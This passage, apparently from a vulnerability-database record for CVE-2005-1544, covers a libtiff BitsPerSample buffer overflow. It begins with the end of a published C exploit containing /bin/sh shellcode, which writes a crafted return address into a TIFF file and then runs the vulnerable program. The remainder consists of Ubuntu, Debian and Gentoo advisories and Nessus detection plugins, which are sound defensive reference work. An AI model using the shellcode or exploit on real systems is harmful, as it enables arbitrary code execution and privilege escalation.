\"\\xeb\\x20\\x5e\\x89\\x76\\x08\\x31\\xc0\\x89\\x46\\x0c\"\n \"\\x88\\x46\\x07\\x8d\\x56\\x0c\\x8d\\x4e\\x08\\x89\\xf3\"\n \"\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xdb\\xb0\\x01\\xcd\"\n \"\\x80\\xe8\\xdb\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\"\n \"\\x73\\x68\\x23\";\n \n #endif\n\n if(argc < 3)\n {\n fprintf(stderr, \"Error, arguments are like these\\n\"\n \"%s <path_to_vuln> <eviltiff.tiff>\\n\", argv[0]);\n return -1;\n }\n \n char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};\n \n /* argv[1] -> executable file that is linked with vuln tiff library */\n long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;\n \n int fd = open(argv[2], O_RDWR);\n if(fd == -1)\n {\n perror(\"open()\");\n return -1;\n }\n \n if(lseek(fd, OFFSET, SEEK_SET) == -1)\n {\n perror(\"lseek()\");\n close(fd);\n return -1;\n }\n \n if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))\n {\n perror(\"write()\");\n close(fd);\n return -1;\n }\n \n close(fd);\n \n fprintf(stdout, \"Using RET: 0x%.8x\\n\", (unsigned int) ret);\n \n if(execle(argv[1], \"tiff\", argv[2], NULL, envp) == -1)\n {\n perror(\"execve()\");\n return -1;\n }\n \n return 0;\n}\n\n// milw0rm.com [2006-03-05]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1554/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "cvelist": ["CVE-2005-1544"], "description": "===========================================================\r\nUbuntu Security Notice USN-130-1 May 19, 2005\r\ntiff vulnerability\r\nCAN-2005-1544\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 (Warty Warthog)\r\nUbuntu 5.04 (Hoary Hedgehog)\r\n\r\nThe following packages are affected:\r\n\r\nlibtiff4\r\n\r\nThe problem can be corrected by upgrading the affected package\r\nto\r\nversion 3.6.1-1.1ubuntu1.3 (for Ubuntu 4.10), or\r\n3.6.1-5ubuntu0.1 (for\r\nUbuntu 5.04). After a standard system upgrade you need to\r\nrestart\r\nyour CUPS server with\r\n\r\n sudo /etc/init.d/cupsys restart\r\n\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nTavis Ormandy discovered a buffer overflow in the TIFF library.\r\nmalicious image with an invalid "bits per sample" number could\r\nbe\r\nconstructed which, when decoded, would have resulted in\r\nexecution of\r\narbitrary code with the privileges of the process using the\r\nlibrary.\r\n\r\nSince this library is used in many applications like\r\n"ghostscript" and\r\nthe "CUPS" printing system, this vulnerability may lead to\r\nremotely\r\ninduced privilege escalation.\r\n\r\nUpdated packages for Ubuntu 4.10 (Warty Warthog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-1.1ubuntu1.3.diff.gz\r\n Size/MD5: 23204 9ac3ca3fba6f2dfee338a6ead67dd861\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-1.1ubuntu1.3.dsc\r\n Size/MD5: 646 dd500c399e6e27e8fccc0a2217b81e24\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1.orig.tar.gz\r\n Size/MD5: 848760 bd252167a20ac7910ab3bd2b3ee9e955\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 172882 44812e9c564e534afaf120298a05649d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 458464 45c8e715cfd6d0d10a8f7755d444e8b2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 111528 c3e7f1e32d02fb2f43dcd7eba004f410\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 157242 89a8e234340550fbb7b51b0665f57b07\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 439630 bc310ca8d58fd2edff9becf96618016a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 102426 b57bcb6731278bd7b9efac661b1d5b29\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 187860 a90692f339814812b81b45bd42b020ad\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 462482 263381d0e365ef440423e5a39fce2fd9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 112628 7e2d3f122c362d9afce7fdb1058e1628\r\n\r\nUpdated packages for Ubuntu 5.04 (Hoary Hedgehog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-5ubuntu0.1.diff.gz\r\n Size/MD5: 23765 32eb02942dff40b39c1d15250c3c0859\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-5ubuntu0.1.dsc\r\n Size/MD5: 681 2450a075bf97cc3f9e6824361985c8d4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1.orig.tar.gz\r\n Size/MD5: 848760 bd252167a20ac7910ab3bd2b3ee9e955\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 172924 7231c0247df7c384675a9c6635daa4c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 458530 0dc168ca75707a0ad7cae668ee8f8c94\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 111658 3f9045465c9ec449afa7ed5f407ef182\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 155938 1a2182f4b9d338b6384a285aa4274193\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 439730 df6990250a7715682cadfdef6a6e8bb3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 102640 15d2802c1720a6597838adb38fd69b8f\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 188166 0cdfe537f7838f94dad74e96e9d741b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 462522 673438e0b48b119901dfc70189a1af94\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 112828 656a62054187e8a3c803fecc54f6fe09", "edition": 1, "modified": "2005-05-19T00:00:00", "published": "2005-05-19T00:00:00", "id": "SECURITYVULNS:DOC:8665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8665", "title": "[Full-disclosure] [USN-130-1] TIFF library vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:12:20", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 755-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJuly 13th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tiff\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-1544\nDebian Bug : 309739\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the executionof arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.7.2-3.\n\nWe recommend that you upgrade your libtiff packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.dsc\n Size/MD5 checksum: 623 fdb202eb01852d3aab26758f5f9a50ce\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.diff.gz\n Size/MD5 checksum: 37270 3e154325390b0446bee083a7470adaac\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5.orig.tar.gz\n Size/MD5 checksum: 693641 3b7199ba793dec6ca88f38bb0c8cc4d8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_alpha.deb\n Size/MD5 checksum: 141498 f0d74c745fc5f75016e190f7c9af0604\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_alpha.deb\n Size/MD5 checksum: 105544 ff3fe1edd72064a3cec25578decb4ce8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_alpha.deb\n Size/MD5 checksum: 423258 d26ce2a8049612b29c4736f341930439\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_arm.deb\n Size/MD5 checksum: 117004 f1c9aafcdaae7148cdb5f13e1805ded5\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_arm.deb\n Size/MD5 checksum: 90842 e13019cb16071175cc0b88526d6dc28a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_arm.deb\n Size/MD5 checksum: 404308 162fe09877bf4e31044ad2c1c16983bf\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_i386.deb\n Size/MD5 checksum: 112070 9351594ccf87495bc0ec6fb3624d9983\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_i386.deb\n Size/MD5 checksum: 81468 76f340590aa4a0546d810a7e7c7691a8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_i386.deb\n Size/MD5 checksum: 386938 25f47760934bf3abdf6aa5ac60a0bf84\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_ia64.deb\n Size/MD5 checksum: 158806 0a4abf7ed300b3c33a2e590caa3dd2c1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_ia64.deb\n Size/MD5 checksum: 135786 341bf0f708522080b931e89a87b598a6\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_ia64.deb\n Size/MD5 checksum: 446574 126ed5be544a1eefe30228d06db9e219\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_hppa.deb\n Size/MD5 checksum: 128298 db87d7cbeb3620736f8cabb0286f831e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_hppa.deb\n Size/MD5 checksum: 107142 515937e00c5a75f3efa61749a8c8cf58\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_hppa.deb\n Size/MD5 checksum: 420334 0f55b4124cd813964a438403f1253582\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_m68k.deb\n Size/MD5 checksum: 107324 33229624caf61822d6cf77e90872c6f9\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_m68k.deb\n Size/MD5 checksum: 80132 4d4279969b7526649874eb657accc2b1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_m68k.deb\n Size/MD5 checksum: 380204 68a43fac8f06c48d38ddffc058c7242c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mips.deb\n Size/MD5 checksum: 124008 20f911e6540aa69fc85fd07567fe4697\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mips.deb\n Size/MD5 checksum: 88202 7d68f62089e9546c06d9ffa80e7b0a74\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mips.deb\n Size/MD5 checksum: 410562 5fa6371f247618b5522ff51259ba35b2\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 123504 ba3102303df4d1cbde4303a00e3428ed\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 88530 c1f77d45cda72501d85607ea50f5a4b2\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 410766 3e3a11a28bc4f1f8081b77e5c72000b0\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 116072 045e7bbd3d4dfb9dc75268435aa62794\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 89824 3e7d286752e28fea6769936695e097d8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 402420 876d140d9752aaea30cb4cd7f9a38cb2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_s390.deb\n Size/MD5 checksum: 116924 380141ee69a4a10201efc66182fe5616\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_s390.deb\n Size/MD5 checksum: 92150 762a64a6166aa720fcbf5430a26760cf\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_s390.deb\n Size/MD5 checksum: 395362 228596854105753bc1a0139bc6e1fef0\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_sparc.deb\n Size/MD5 checksum: 132902 65969fd417aa734f6299c0f35f15dff9\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_sparc.deb\n Size/MD5 checksum: 88982 e674bafc1f1df1617b70f4184051da79\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_sparc.deb\n Size/MD5 checksum: 397132 e1ebfa6cdfec77c9c643f494e72d0714\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 9, "modified": "2005-07-13T00:00:00", "published": "2005-07-13T00:00:00", "id": "DEBIAN:DSA-755-1:F11EF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00141.html", "title": "[SECURITY] [DSA 755-1] New tiff packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "\nA Gentoo Linux Security Advisory reports:\n\nTavis Ormandy of the Gentoo Linux Security Audit Team\n\t discovered a stack based buffer overflow in the libTIFF\n\t library when reading a TIFF image with a malformed\n\t BitsPerSample tag.\nSuccessful exploitation would require the victim to open\n\t a specially crafted TIFF image, resulting in the execution\n\t of arbitrary code.\n\n", "edition": 4, "modified": "2006-06-08T00:00:00", "published": "2005-05-10T00:00:00", "id": "68222076-010B-11DA-BC08-0001020EED82", "href": "https://vuxml.freebsd.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html", "title": "tiff -- buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T06:37:13", "description": "Tavis Ormandy discovered a buffer overflow in the TIFF library. A\nmalicious image with an invalid 'bits per sample' number could be\nconstructed which, when decoded, would have resulted in execution of\narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like 'ghostscript' and\nthe 'CUPS' printing system, this vulnerability may lead to remotely\ninduced privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 / 5.04 : tiff vulnerability (USN-130-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtiff4", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:libtiff-tools", "p-cpe:/a:canonical:ubuntu_linux:libtiff4-dev"], "id": "UBUNTU_USN-130-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20521", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-130-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20521);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/08/02 13:33:00\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"USN\", value:\"130-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 : tiff vulnerability (USN-130-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy discovered a buffer overflow in the TIFF library. A\nmalicious image with an invalid 'bits per sample' number could be\nconstructed which, when decoded, would have resulted in execution of\narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like 'ghostscript' and\nthe 'CUPS' printing system, this vulnerability may lead to remotely\ninduced privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libtiff-tools, libtiff4 and / or libtiff4-dev\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff-tools\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff4\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff4-dev\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff-tools\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4-dev\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff-tools / libtiff4 / libtiff4-dev\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:03:22", "description": "Frank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the execution of arbitrary code via malformed TIFF\nfiles.", "edition": 25, "published": "2005-07-13T00:00:00", "title": "Debian DSA-755-1 : tiff - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:tiff"], "id": "DEBIAN_DSA-755.NASL", "href": "https://www.tenable.com/plugins/nessus/19189", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-755. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19189);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"DSA\", value:\"755\");\n\n script_name(english:\"Debian DSA-755-1 : tiff - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Frank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the execution of arbitrary code via malformed TIFF\nfiles.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=309739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-755\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libtiff packages.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libtiff-tools\", reference:\"3.5.5-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libtiff3g\", reference:\"3.5.5-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libtiff3g-dev\", reference:\"3.5.5-7\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"tiff\", reference:\"3.7.2-3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:57", "description": "The remote host is affected by the vulnerability described in GLSA-200505-07\n(libTIFF: Buffer overflow)\n\n Tavis Ormandy of the Gentoo Linux Security Audit Team discovered a\n stack based buffer overflow in the libTIFF library when reading a TIFF\n image with a malformed BitsPerSample tag.\n \nImpact :\n\n Successful exploitation would require the victim to open a specially\n crafted TIFF image, resulting in the execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2005-05-11T00:00:00", "title": "GLSA-200505-07 : libTIFF: Buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-05-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:tiff"], "id": "GENTOO_GLSA-200505-07.NASL", 